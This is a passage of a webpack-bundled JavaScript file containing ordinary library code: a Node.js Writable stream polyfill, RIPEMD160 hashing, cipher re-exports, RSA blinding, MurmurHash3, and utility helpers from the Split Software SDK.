  // the callback that the user supplies to write(chunk,encoding,cb)
  this.writecb = null;

  // the amount that is being written when _write is called.
  this.writelen = 0;

  this.bufferedRequest = null;
  this.lastBufferedRequest = null;

  // number of pending user-supplied write callbacks
  // this must be 0 before 'finish' can be emitted
  this.pendingcb = 0;

  // emit prefinish if the only thing we're waiting for is _write cbs
  // This is relevant for synchronous Transform streams
  this.prefinished = false;

  // True if the error was already emitted and should not be thrown again
  this.errorEmitted = false;

  // count buffered requests
  this.bufferedRequestCount = 0;

  // allocate the first CorkedRequest, there is always
  // one allocated and free to use, and we maintain at most two
  this.corkedRequestsFree = new CorkedRequest(this);
}

WritableState.prototype.getBuffer = function getBuffer() {
  var current = this.bufferedRequest;
  var out = [];
  while (current) {
    out.push(current);
    current = current.next;
  }
  return out;
};

(function () {
  try {
    Object.defineProperty(WritableState.prototype, 'buffer', {
      get: internalUtil.deprecate(function () {
        return this.getBuffer();
      }, '_writableState.buffer is deprecated. Use _writableState.getBuffer ' + 'instead.', 'DEP0003')
    });
  } catch (_) {}
})();

// Test _writableState for inheritance to account for Duplex streams,
// whose prototype chain only points to Readable.
var realHasInstance;
if (typeof Symbol === 'function' && Symbol.hasInstance && typeof Function.prototype[Symbol.hasInstance] === 'function') {
  realHasInstance = Function.prototype[Symbol.hasInstance];
  Object.defineProperty(Writable, Symbol.hasInstance, {
    value: function (object) {
      if (realHasInstance.call(this, object)) return true;
      if (this !== Writable) return false;

      return object && object._writableState instanceof WritableState;
    }
  });
} else {
  realHasInstance = function (object) {
    return object instanceof this;
  };
}

function Writable(options) {
  Duplex = Duplex || __webpack_require__(237);

  // Writable ctor is applied to Duplexes, too.
  // `realHasInstance` is necessary because using plain `instanceof`
  // would return false, as no `_writableState` property is attached.

  // Trying to use the custom `instanceof` for Writable here will also break the
  // Node.js LazyTransform implementation, which has a non-trivial getter for
  // `_writableState` that would lead to infinite recursion.
  if (!realHasInstance.call(Writable, this) && !(this instanceof Duplex)) {
    return new Writable(options);
  }

  this._writableState = new WritableState(options, this);

  // legacy.
  this.writable = true;

  if (options) {
    if (typeof options.write === 'function') this._write = options.write;

    if (typeof options.writev === 'function') this._writev = options.writev;

    if (typeof options.destroy === 'function') this._destroy = options.destroy;

    if (typeof options.final === 'function') this._final = options.final;
  }

  Stream.call(this);
}

// Otherwise people can pipe Writable streams, which is just wrong.
Writable.prototype.pipe = function () {
  this.emit('error', new Error('Cannot pipe, not readable'));
};

function writeAfterEnd(stream, cb) {
  var er = new Error('write after end');
  // TODO: defer error events consistently everywhere, not just the cb
  stream.emit('error', er);
  pna.nextTick(cb, er);
}

// Checks that a user-supplied chunk is valid, especially for the particular
// mode the stream is in. Currently this means that `null` is never accepted
// and undefined/non-string values are only allowed in object mode.
function validChunk(stream, state, chunk, cb) {
  var valid = true;
  var er = false;

  if (chunk === null) {
    er = new TypeError('May not write null values to stream');
  } else if (typeof chunk !== 'string' && chunk !== undefined && !state.objectMode) {
    er = new TypeError('Invalid non-string/buffer chunk');
  }
  if (er) {
    stream.emit('error', er);
    pna.nextTick(cb, er);
    valid = false;
  }
  return valid;
}

Writable.prototype.write = function (chunk, encoding, cb) {
  var state = this._writableState;
  var ret = false;
  var isBuf = !state.objectMode && _isUint8Array(chunk);

  if (isBuf && !Buffer.isBuffer(chunk)) {
    chunk = _uint8ArrayToBuffer(chunk);
  }

  if (typeof encoding === 'function') {
    cb = encoding;
    encoding = null;
  }

  if (isBuf) encoding = 'buffer';else if (!encoding) encoding = state.defaultEncoding;

  if (typeof cb !== 'function') cb = nop;

  if (state.ended) writeAfterEnd(this, cb);else if (isBuf || validChunk(this, state, chunk, cb)) {
    state.pendingcb++;
    ret = writeOrBuffer(this, state, isBuf, chunk, encoding, cb);
  }

  return ret;
};

Writable.prototype.cork = function () {
  var state = this._writableState;

  state.corked++;
};

Writable.prototype.uncork = function () {
  var state = this._writableState;

  if (state.corked) {
    state.corked--;

    if (!state.writing && !state.corked && !state.finished && !state.bufferProcessing && state.bufferedRequest) clearBuffer(this, state);
  }
};

Writable.prototype.setDefaultEncoding = function setDefaultEncoding(encoding) {
  // node::ParseEncoding() requires lower case.
  if (typeof encoding === 'string') encoding = encoding.toLowerCase();
  if (!(['hex', 'utf8', 'utf-8', 'ascii', 'binary', 'base64', 'ucs2', 'ucs-2', 'utf16le', 'utf-16le', 'raw'].indexOf((encoding + '').toLowerCase()) > -1)) throw new TypeError('Unknown encoding: ' + encoding);
  this._writableState.defaultEncoding = encoding;
  return this;
};

function decodeChunk(state, chunk, encoding) {
  if (!state.objectMode && state.decodeStrings !== false && typeof chunk === 'string') {
    chunk = Buffer.from(chunk, encoding);
  }
  return chunk;
}

Object.defineProperty(Writable.prototype, 'writableHighWaterMark', {
  // making it explicit this property is not enumerable
  // because otherwise some prototype manipulation in
  // userland will fail
  enumerable: false,
  get: function () {
    return this._writableState.highWaterMark;
  }
});

// if we're already writing something, then just put this
// in the queue, and wait our turn.  Otherwise, call _write
// If we return false, then we need a drain event, so set that flag.
function writeOrBuffer(stream, state, isBuf, chunk, encoding, cb) {
  if (!isBuf) {
    var newChunk = decodeChunk(state, chunk, encoding);
    if (chunk !== newChunk) {
      isBuf = true;
      encoding = 'buffer';
      chunk = newChunk;
    }
  }
  var len = state.objectMode ? 1 : chunk.length;

  state.length += len;

  var ret = state.length < state.highWaterMark;
  // we must ensure that previous needDrain will not be reset to false.
  if (!ret) state.needDrain = true;

  if (state.writing || state.corked) {
    var last = state.lastBufferedRequest;
    state.lastBufferedRequest = {
      chunk: chunk,
      encoding: encoding,
      isBuf: isBuf,
      callback: cb,
      next: null
    };
    if (last) {
      last.next = state.lastBufferedRequest;
    } else {
      state.bufferedRequest = state.lastBufferedRequest;
    }
    state.bufferedRequestCount += 1;
  } else {
    doWrite(stream, state, false, len, chunk, encoding, cb);
  }

  return ret;
}

function doWrite(stream, state, writev, len, chunk, encoding, cb) {
  state.writelen = len;
  state.writecb = cb;
  state.writing = true;
  state.sync = true;
  if (writev) stream._writev(chunk, state.onwrite);else stream._write(chunk, encoding, state.onwrite);
  state.sync = false;
}

function onwriteError(stream, state, sync, er, cb) {
  --state.pendingcb;

  if (sync) {
    // defer the callback if we are being called synchronously
    // to avoid piling up things on the stack
    pna.nextTick(cb, er);
    // this can emit finish, and it will always happen
    // after error
    pna.nextTick(finishMaybe, stream, state);
    stream._writableState.errorEmitted = true;
    stream.emit('error', er);
  } else {
    // the caller expect this to happen before if
    // it is async
    cb(er);
    stream._writableState.errorEmitted = true;
    stream.emit('error', er);
    // this can emit finish, but finish must
    // always follow error
    finishMaybe(stream, state);
  }
}

function onwriteStateUpdate(state) {
  state.writing = false;
  state.writecb = null;
  state.length -= state.writelen;
  state.writelen = 0;
}

function onwrite(stream, er) {
  var state = stream._writableState;
  var sync = state.sync;
  var cb = state.writecb;

  onwriteStateUpdate(state);

  if (er) onwriteError(stream, state, sync, er, cb);else {
    // Check if we're actually ready to finish, but don't emit yet
    var finished = needFinish(state);

    if (!finished && !state.corked && !state.bufferProcessing && state.bufferedRequest) {
      clearBuffer(stream, state);
    }

    if (sync) {
      /*<replacement>*/
      asyncWrite(afterWrite, stream, state, finished, cb);
      /*</replacement>*/
    } else {
      afterWrite(stream, state, finished, cb);
    }
  }
}

function afterWrite(stream, state, finished, cb) {
  if (!finished) onwriteDrain(stream, state);
  state.pendingcb--;
  cb();
  finishMaybe(stream, state);
}

// Must force callback to be called on nextTick, so that we don't
// emit 'drain' before the write() consumer gets the 'false' return
// value, and has a chance to attach a 'drain' listener.
function onwriteDrain(stream, state) {
  if (state.length === 0 && state.needDrain) {
    state.needDrain = false;
    stream.emit('drain');
  }
}

// if there's something in the buffer waiting, then process it
function clearBuffer(stream, state) {
  state.bufferProcessing = true;
  var entry = state.bufferedRequest;

  if (stream._writev && entry && entry.next) {
    // Fast case, write everything using _writev()
    var l = state.bufferedRequestCount;
    var buffer = new Array(l);
    var holder = state.corkedRequestsFree;
    holder.entry = entry;

    var count = 0;
    var allBuffers = true;
    while (entry) {
      buffer[count] = entry;
      if (!entry.isBuf) allBuffers = false;
      entry = entry.next;
      count += 1;
    }
    buffer.allBuffers = allBuffers;

    doWrite(stream, state, true, state.length, buffer, '', holder.finish);

    // doWrite is almost always async, defer these to save a bit of time
    // as the hot path ends with doWrite
    state.pendingcb++;
    state.lastBufferedRequest = null;
    if (holder.next) {
      state.corkedRequestsFree = holder.next;
      holder.next = null;
    } else {
      state.corkedRequestsFree = new CorkedRequest(state);
    }
    state.bufferedRequestCount = 0;
  } else {
    // Slow case, write chunks one-by-one
    while (entry) {
      var chunk = entry.chunk;
      var encoding = entry.encoding;
      var cb = entry.callback;
      var len = state.objectMode ? 1 : chunk.length;

      doWrite(stream, state, false, len, chunk, encoding, cb);
      entry = entry.next;
      state.bufferedRequestCount--;
      // if we didn't call the onwrite immediately, then
      // it means that we need to wait until it does.
      // also, that means that the chunk and cb are currently
      // being processed, so move the buffer counter past them.
      if (state.writing) {
        break;
      }
    }

    if (entry === null) state.lastBufferedRequest = null;
  }

  state.bufferedRequest = entry;
  state.bufferProcessing = false;
}

Writable.prototype._write = function (chunk, encoding, cb) {
  cb(new Error('_write() is not implemented'));
};

Writable.prototype._writev = null;

Writable.prototype.end = function (chunk, encoding, cb) {
  var state = this._writableState;

  if (typeof chunk === 'function') {
    cb = chunk;
    chunk = null;
    encoding = null;
  } else if (typeof encoding === 'function') {
    cb = encoding;
    encoding = null;
  }

  if (chunk !== null && chunk !== undefined) this.write(chunk, encoding);

  // .end() fully uncorks
  if (state.corked) {
    state.corked = 1;
    this.uncork();
  }

  // ignore unnecessary end() calls.
  if (!state.ending && !state.finished) endWritable(this, state, cb);
};

function needFinish(state) {
  return state.ending && state.length === 0 && state.bufferedRequest === null && !state.finished && !state.writing;
}
function callFinal(stream, state) {
  stream._final(function (err) {
    state.pendingcb--;
    if (err) {
      stream.emit('error', err);
    }
    state.prefinished = true;
    stream.emit('prefinish');
    finishMaybe(stream, state);
  });
}
function prefinish(stream, state) {
  if (!state.prefinished && !state.finalCalled) {
    if (typeof stream._final === 'function') {
      state.pendingcb++;
      state.finalCalled = true;
      pna.nextTick(callFinal, stream, state);
    } else {
      state.prefinished = true;
      stream.emit('prefinish');
    }
  }
}

function finishMaybe(stream, state) {
  var need = needFinish(state);
  if (need) {
    prefinish(stream, state);
    if (state.pendingcb === 0) {
      state.finished = true;
      stream.emit('finish');
    }
  }
  return need;
}

function endWritable(stream, state, cb) {
  state.ending = true;
  finishMaybe(stream, state);
  if (cb) {
    if (state.finished) pna.nextTick(cb);else stream.once('finish', cb);
  }
  state.ended = true;
  stream.writable = false;
}

function onCorkedFinish(corkReq, state, err) {
  var entry = corkReq.entry;
  corkReq.entry = null;
  while (entry) {
    var cb = entry.callback;
    state.pendingcb--;
    cb(err);
    entry = entry.next;
  }
  if (state.corkedRequestsFree) {
    state.corkedRequestsFree.next = corkReq;
  } else {
    state.corkedRequestsFree = corkReq;
  }
}

Object.defineProperty(Writable.prototype, 'destroyed', {
  get: function () {
    if (this._writableState === undefined) {
      return false;
    }
    return this._writableState.destroyed;
  },
  set: function (value) {
    // we ignore the value if the stream
    // has not been initialized yet
    if (!this._writableState) {
      return;
    }

    // backward compatibility, the user is explicitly
    // managing destroyed
    this._writableState.destroyed = value;
  }
});

Writable.prototype.destroy = destroyImpl.destroy;
Writable.prototype._undestroy = destroyImpl.undestroy;
Writable.prototype._destroy = function (err, cb) {
  this.end();
  cb(err);
};
/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(83), __webpack_require__(632).setImmediate, __webpack_require__(17)))

/***/ }),
/* 689 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";

var Buffer = __webpack_require__(43).Buffer
var inherits = __webpack_require__(25)
var HashBase = __webpack_require__(1234)

var ARRAY16 = new Array(16)

var zl = [
  0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
  7, 4, 13, 1, 10, 6, 15, 3, 12, 0, 9, 5, 2, 14, 11, 8,
  3, 10, 14, 4, 9, 15, 8, 1, 2, 7, 0, 6, 13, 11, 5, 12,
  1, 9, 11, 10, 0, 8, 12, 4, 13, 3, 7, 15, 14, 5, 6, 2,
  4, 0, 5, 9, 7, 12, 2, 10, 14, 1, 3, 8, 11, 6, 15, 13
]

var zr = [
  5, 14, 7, 0, 9, 2, 11, 4, 13, 6, 15, 8, 1, 10, 3, 12,
  6, 11, 3, 7, 0, 13, 5, 10, 14, 15, 8, 12, 4, 9, 1, 2,
  15, 5, 1, 3, 7, 14, 6, 9, 11, 8, 12, 2, 10, 0, 4, 13,
  8, 6, 4, 1, 3, 11, 15, 0, 5, 12, 2, 13, 9, 7, 10, 14,
  12, 15, 10, 4, 1, 5, 8, 7, 6, 2, 13, 14, 0, 3, 9, 11
]

var sl = [
  11, 14, 15, 12, 5, 8, 7, 9, 11, 13, 14, 15, 6, 7, 9, 8,
  7, 6, 8, 13, 11, 9, 7, 15, 7, 12, 15, 9, 11, 7, 13, 12,
  11, 13, 6, 7, 14, 9, 13, 15, 14, 8, 13, 6, 5, 12, 7, 5,
  11, 12, 14, 15, 14, 15, 9, 8, 9, 14, 5, 6, 8, 6, 5, 12,
  9, 15, 5, 11, 6, 8, 13, 12, 5, 12, 13, 14, 11, 8, 5, 6
]

var sr = [
  8, 9, 9, 11, 13, 15, 15, 5, 7, 7, 8, 11, 14, 14, 12, 6,
  9, 13, 15, 7, 12, 8, 9, 11, 7, 7, 12, 7, 6, 15, 13, 11,
  9, 7, 15, 11, 8, 6, 6, 14, 12, 13, 5, 14, 13, 13, 7, 5,
  15, 5, 8, 11, 14, 14, 6, 14, 6, 9, 12, 9, 12, 5, 15, 8,
  8, 5, 12, 9, 12, 5, 14, 6, 8, 13, 6, 5, 15, 13, 11, 11
]

var hl = [0x00000000, 0x5a827999, 0x6ed9eba1, 0x8f1bbcdc, 0xa953fd4e]
var hr = [0x50a28be6, 0x5c4dd124, 0x6d703ef3, 0x7a6d76e9, 0x00000000]

function RIPEMD160 () {
  HashBase.call(this, 64)

  // state
  this._a = 0x67452301
  this._b = 0xefcdab89
  this._c = 0x98badcfe
  this._d = 0x10325476
  this._e = 0xc3d2e1f0
}

inherits(RIPEMD160, HashBase)

RIPEMD160.prototype._update = function () {
  var words = ARRAY16
  for (var j = 0; j < 16; ++j) words[j] = this._block.readInt32LE(j * 4)

  var al = this._a | 0
  var bl = this._b | 0
  var cl = this._c | 0
  var dl = this._d | 0
  var el = this._e | 0

  var ar = this._a | 0
  var br = this._b | 0
  var cr = this._c | 0
  var dr = this._d | 0
  var er = this._e | 0

  // computation
  for (var i = 0; i < 80; i += 1) {
    var tl
    var tr
    if (i < 16) {
      tl = fn1(al, bl, cl, dl, el, words[zl[i]], hl[0], sl[i])
      tr = fn5(ar, br, cr, dr, er, words[zr[i]], hr[0], sr[i])
    } else if (i < 32) {
      tl = fn2(al, bl, cl, dl, el, words[zl[i]], hl[1], sl[i])
      tr = fn4(ar, br, cr, dr, er, words[zr[i]], hr[1], sr[i])
    } else if (i < 48) {
      tl = fn3(al, bl, cl, dl, el, words[zl[i]], hl[2], sl[i])
      tr = fn3(ar, br, cr, dr, er, words[zr[i]], hr[2], sr[i])
    } else if (i < 64) {
      tl = fn4(al, bl, cl, dl, el, words[zl[i]], hl[3], sl[i])
      tr = fn2(ar, br, cr, dr, er, words[zr[i]], hr[3], sr[i])
    } else { // if (i<80) {
      tl = fn5(al, bl, cl, dl, el, words[zl[i]], hl[4], sl[i])
      tr = fn1(ar, br, cr, dr, er, words[zr[i]], hr[4], sr[i])
    }

    al = el
    el = dl
    dl = rotl(cl, 10)
    cl = bl
    bl = tl

    ar = er
    er = dr
    dr = rotl(cr, 10)
    cr = br
    br = tr
  }

  // update state
  var t = (this._b + cl + dr) | 0
  this._b = (this._c + dl + er) | 0
  this._c = (this._d + el + ar) | 0
  this._d = (this._e + al + br) | 0
  this._e = (this._a + bl + cr) | 0
  this._a = t
}

RIPEMD160.prototype._digest = function () {
  // create padding and handle blocks
  this._block[this._blockOffset++] = 0x80
  if (this._blockOffset > 56) {
    this._block.fill(0, this._blockOffset, 64)
    this._update()
    this._blockOffset = 0
  }

  this._block.fill(0, this._blockOffset, 56)
  this._block.writeUInt32LE(this._length[0], 56)
  this._block.writeUInt32LE(this._length[1], 60)
  this._update()

  // produce result
  var buffer = Buffer.alloc ? Buffer.alloc(20) : new Buffer(20)
  buffer.writeInt32LE(this._a, 0)
  buffer.writeInt32LE(this._b, 4)
  buffer.writeInt32LE(this._c, 8)
  buffer.writeInt32LE(this._d, 12)
  buffer.writeInt32LE(this._e, 16)
  return buffer
}

function rotl (x, n) {
  return (x << n) | (x >>> (32 - n))
}

function fn1 (a, b, c, d, e, m, k, s) {
  return (rotl((a + (b ^ c ^ d) + m + k) | 0, s) + e) | 0
}

function fn2 (a, b, c, d, e, m, k, s) {
  return (rotl((a + ((b & c) | ((~b) & d)) + m + k) | 0, s) + e) | 0
}

function fn3 (a, b, c, d, e, m, k, s) {
  return (rotl((a + ((b | (~c)) ^ d) + m + k) | 0, s) + e) | 0
}

function fn4 (a, b, c, d, e, m, k, s) {
  return (rotl((a + ((b & d) | (c & (~d))) + m + k) | 0, s) + e) | 0
}

function fn5 (a, b, c, d, e, m, k, s) {
  return (rotl((a + (b ^ (c | (~d))) + m + k) | 0, s) + e) | 0
}

module.exports = RIPEMD160


/***/ }),
/* 690 */
/***/ (function(module, exports, __webpack_require__) {

var exports = module.exports = function SHA (algorithm) {
  algorithm = algorithm.toLowerCase()

  var Algorithm = exports[algorithm]
  if (!Algorithm) throw new Error(algorithm + ' is not supported (we accept pull requests)')

  return new Algorithm()
}

exports.sha = __webpack_require__(2673)
exports.sha1 = __webpack_require__(2674)
exports.sha224 = __webpack_require__(2675)
exports.sha256 = __webpack_require__(1239)
exports.sha384 = __webpack_require__(2676)
exports.sha512 = __webpack_require__(1240)


/***/ }),
/* 691 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


exports.utils = __webpack_require__(2682);
exports.Cipher = __webpack_require__(2683);
exports.DES = __webpack_require__(2684);
exports.CBC = __webpack_require__(2685);
exports.EDE = __webpack_require__(2686);


/***/ }),
/* 692 */
/***/ (function(module, exports, __webpack_require__) {

var ciphers = __webpack_require__(2687)
var deciphers = __webpack_require__(2696)
var modes = __webpack_require__(1250)

function getCiphers () {
  return Object.keys(modes)
}

exports.createCipher = exports.Cipher = ciphers.createCipher
exports.createCipheriv = exports.Cipheriv = ciphers.createCipheriv
exports.createDecipher = exports.Decipher = deciphers.createDecipher
exports.createDecipheriv = exports.Decipheriv = deciphers.createDecipheriv
exports.listCiphers = exports.getCiphers = getCiphers


/***/ }),
/* 693 */
/***/ (function(module, exports, __webpack_require__) {

var modeModules = {
  ECB: __webpack_require__(2688),
  CBC: __webpack_require__(2689),
  CFB: __webpack_require__(2690),
  CFB8: __webpack_require__(2691),
  CFB1: __webpack_require__(2692),
  OFB: __webpack_require__(2693),
  CTR: __webpack_require__(1248),
  GCM: __webpack_require__(1248)
}

var modes = __webpack_require__(1250)

for (var key in modes) {
  modes[key].module = modeModules[modes[key].mode]
}

module.exports = modes


/***/ }),
/* 694 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {var bn = __webpack_require__(63);
var randomBytes = __webpack_require__(274);
module.exports = crt;
function blind(priv) {
  var r = getr(priv);
  var blinder = r.toRed(bn.mont(priv.modulus))
  .redPow(new bn(priv.publicExponent)).fromRed();
  return {
    blinder: blinder,
    unblinder:r.invm(priv.modulus)
  };
}
function crt(msg, priv) {
  var blinds = blind(priv);
  var len = priv.modulus.byteLength();
  var mod = bn.mont(priv.modulus);
  var blinded = new bn(msg).mul(blinds.blinder).umod(priv.modulus);
  var c1 = blinded.toRed(bn.mont(priv.prime1));
  var c2 = blinded.toRed(bn.mont(priv.prime2));
  var qinv = priv.coefficient;
  var p = priv.prime1;
  var q = priv.prime2;
  var m1 = c1.redPow(priv.exponent1);
  var m2 = c2.redPow(priv.exponent2);
  m1 = m1.fromRed();
  m2 = m2.fromRed();
  var h = m1.isub(m2).imul(qinv).umod(p);
  h.imul(q);
  m2.iadd(h);
  return new Buffer(m2.imul(blinds.unblinder).umod(priv.modulus).toArray(false, len));
}
crt.getr = getr;
function getr(priv) {
  var len = priv.modulus.byteLength();
  var r = new bn(randomBytes(len));
  while (r.cmp(priv.modulus) >=  0 || !r.umod(priv.prime1) || !r.umod(priv.prime2)) {
    r = new bn(randomBytes(len));
  }
  return r;
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 695 */,
/* 696 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _inheritsLoose;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__setPrototypeOf_js__ = __webpack_require__(697);

function _inheritsLoose(subClass, superClass) {
  subClass.prototype = Object.create(superClass.prototype);
  subClass.prototype.constructor = subClass;
  Object(__WEBPACK_IMPORTED_MODULE_0__setPrototypeOf_js__["a" /* default */])(subClass, superClass);
}

/***/ }),
/* 697 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _setPrototypeOf;
function _setPrototypeOf(o, p) {
  _setPrototypeOf = Object.setPrototypeOf || function _setPrototypeOf(o, p) {
    o.__proto__ = p;
    return o;
  };

  return _setPrototypeOf(o, p);
}

/***/ }),
/* 698 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return types; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return dataTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return mapper; });
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
// @WARNING Symbol is not correctly working in PhantomJS
var types = {
  ALL: 1,
  SEGMENT: 2,
  WHITELIST: 3,
  EQUAL_TO: 4,
  GREATER_THAN_OR_EQUAL_TO: 5,
  LESS_THAN_OR_EQUAL_TO: 6,
  BETWEEN: 7,
  UNDEFINED: 8,
  EQUAL_TO_SET: 9,
  CONTAINS_ANY_OF_SET: 10,
  CONTAINS_ALL_OF_SET: 11,
  PART_OF_SET: 12,
  ENDS_WITH: 13,
  STARTS_WITH: 14,
  CONTAINS_STRING: 15,
  IN_SPLIT_TREATMENT: 16,
  EQUAL_TO_BOOLEAN: 17,
  MATCHES_STRING: 18
};
var dataTypes = {
  BOOLEAN: 'BOOLEAN',
  STRING: 'STRING',
  NUMBER: 'NUMBER',
  SET: 'SET',
  DATETIME: 'DATETIME',
  NOT_SPECIFIED: 'NOT_SPECIFIED'
};
var mapper = function mapper(matcherType) {
  switch (matcherType) {
    case 'ALL_KEYS':
      return types.ALL;

    case 'IN_SEGMENT':
      return types.SEGMENT;

    case 'WHITELIST':
      return types.WHITELIST;

    case 'EQUAL_TO':
      return types.EQUAL_TO;

    case 'GREATER_THAN_OR_EQUAL_TO':
      return types.GREATER_THAN_OR_EQUAL_TO;

    case 'LESS_THAN_OR_EQUAL_TO':
      return types.LESS_THAN_OR_EQUAL_TO;

    case 'BETWEEN':
      return types.BETWEEN;

    case 'EQUAL_TO_SET':
      return types.EQUAL_TO_SET;

    case 'CONTAINS_ANY_OF_SET':
      return types.CONTAINS_ANY_OF_SET;

    case 'CONTAINS_ALL_OF_SET':
      return types.CONTAINS_ALL_OF_SET;

    case 'PART_OF_SET':
      return types.PART_OF_SET;

    case 'ENDS_WITH':
      return types.ENDS_WITH;

    case 'STARTS_WITH':
      return types.STARTS_WITH;

    case 'CONTAINS_STRING':
      return types.CONTAINS_STRING;

    case 'IN_SPLIT_TREATMENT':
      return types.IN_SPLIT_TREATMENT;

    case 'EQUAL_TO_BOOLEAN':
      return types.EQUAL_TO_BOOLEAN;

    case 'MATCHES_STRING':
      return types.MATCHES_STRING;

    default:
      return types.UNDEFINED;
  }
};

/***/ }),
/* 699 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__common__ = __webpack_require__(1283);
/* eslint-disable no-fallthrough */

/*!
 * +----------------------------------------------------------------------------------+
 * | murmurHash3.js v3.0.0 (http://github.com/karanlyons/murmurHash3.js)              |
 * | A TypeScript/JavaScript implementation of MurmurHash3's hashing algorithms.      |
 * |----------------------------------------------------------------------------------|
 * | Copyright (c) 2012-2020 Karan Lyons. Freely distributable under the MIT license. |
 * +----------------------------------------------------------------------------------+
 */
// PUBLIC FUNCTIONS
// ----------------

function hash32(key, seed) {
  //
  // Given a string and an optional seed as an int, returns a 32 bit hash
  // using the x86 flavor of MurmurHash3, as an unsigned int.
  //
  key = key || '';
  seed = seed || 0;
  var remainder = key.length % 4;
  var bytes = key.length - remainder;
  var h1 = seed;
  var k1 = 0;
  var c1 = 0xcc9e2d51;
  var c2 = 0x1b873593;

  for (var i = 0; i < bytes; i = i + 4) {
    k1 = key.charCodeAt(i) & 0xff | (key.charCodeAt(i + 1) & 0xff) << 8 | (key.charCodeAt(i + 2) & 0xff) << 16 | (key.charCodeAt(i + 3) & 0xff) << 24;
    k1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["c" /* x86Multiply */])(k1, c1);
    k1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["d" /* x86Rotl */])(k1, 15);
    k1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["c" /* x86Multiply */])(k1, c2);
    h1 ^= k1;
    h1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["d" /* x86Rotl */])(h1, 13);
    h1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["c" /* x86Multiply */])(h1, 5) + 0xe6546b64;
  }

  k1 = 0;

  switch (remainder) {
    case 3:
      k1 ^= (key.charCodeAt(i + 2) & 0xff) << 16;

    case 2:
      k1 ^= (key.charCodeAt(i + 1) & 0xff) << 8;

    case 1:
      k1 ^= key.charCodeAt(i) & 0xff;
      k1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["c" /* x86Multiply */])(k1, c1);
      k1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["d" /* x86Rotl */])(k1, 15);
      k1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["c" /* x86Multiply */])(k1, c2);
      h1 ^= k1;
  }

  h1 ^= key.length;
  h1 = Object(__WEBPACK_IMPORTED_MODULE_0__common__["b" /* x86Fmix */])(h1);
  return h1 >>> 0;
}

function hash(str
/*: string */
, seed
/*: number */
)
/*: number */
{
  return hash32(Object(__WEBPACK_IMPORTED_MODULE_0__common__["a" /* UTF16ToUTF8 */])(str), seed >>> 0);
}

function bucket(str
/*: string */
, seed
/*: number */
)
/*: number */
{
  return Math.abs(hash(str, seed) % 100) + 1;
}

/* harmony default export */ __webpack_exports__["a"] = ({
  hash: hash,
  bucket: bucket
});

/***/ }),
/* 700 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function repeat(fn, delay) {
  for (var _len = arguments.length, rest = new Array(_len > 2 ? _len - 2 : 0), _key = 2; _key < _len; _key++) {
    rest[_key - 2] = arguments[_key];
  }

  var tid;
  var stopped = false;

  function next(_delay) {
    if (_delay === void 0) {
      _delay = delay;
    }

    for (var _len2 = arguments.length, rest = new Array(_len2 > 1 ? _len2 - 1 : 0), _key2 = 1; _key2 < _len2; _key2++) {
      rest[_key2 - 1] = arguments[_key2];
    }

    if (!stopped) {
      // IE 9 doesn't support function arguments through setTimeout call.
      // https://msdn.microsoft.com/en-us/library/ms536753(v=vs.85).aspx
      tid = setTimeout(function () {
        fn.apply(void 0, rest.concat([next]));
      }, _delay);
    }
  }

  function till() {
    clearTimeout(tid);
    tid = undefined;
    stopped = true;
  }

  till.reset = function () {
    clearTimeout(tid);
    tid = undefined;
    next.apply(void 0, [delay].concat(rest));
  };

  fn.apply(void 0, rest.concat([next]));
  return till;
}

/* harmony default export */ __webpack_exports__["a"] = (repeat);

/***/ }),
/* 701 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = decodeFromBase64;
/* harmony export (immutable) */ __webpack_exports__["b"] = encodeToBase64;
/**
 * Decode a given string value in Base64 format
 *
 * @param {string} value to decode
 * @throws {ReferenceError} if `atob` function is not defined
 */
function decodeFromBase64(value) {
  return atob(value);
}
/**
 * Encode a given string value to Base64 format.
 *
 * @param {string} value to encode
 * @throws {ReferenceError} if `btoa` function is not defined
 */

function encodeToBase64(value) {
  return btoa(value);
}

/***/ }),
/* 702 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
var Backoff = /*#__PURE__*/function () {
  /**
   * Schedule function calls with exponential backoff
   *
   * @param {function} cb
   * @param {number} baseMillis
   * @param {number} maxMillis
   */
